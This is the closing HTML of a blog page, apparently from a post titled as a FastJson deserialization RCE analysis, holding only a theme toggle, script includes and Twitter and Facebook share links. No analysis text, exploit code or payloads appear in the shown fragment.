    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + FastJson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E5%88%86%E6%9E%90 + '&url=' + http%3A%2F%2Fkagty1.github.io%2F2025%2F01%2F12%2FFastJson%2520%25E5%258F%258D%25E5%25BA%258F%25E5%2588%2597%25E5%258C%2596RCE%25E5%2588%2586%25E6%259E%2590%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://kagty1.github.io/2025/01/12/FastJson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E5%88%86%E6%9E%90/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
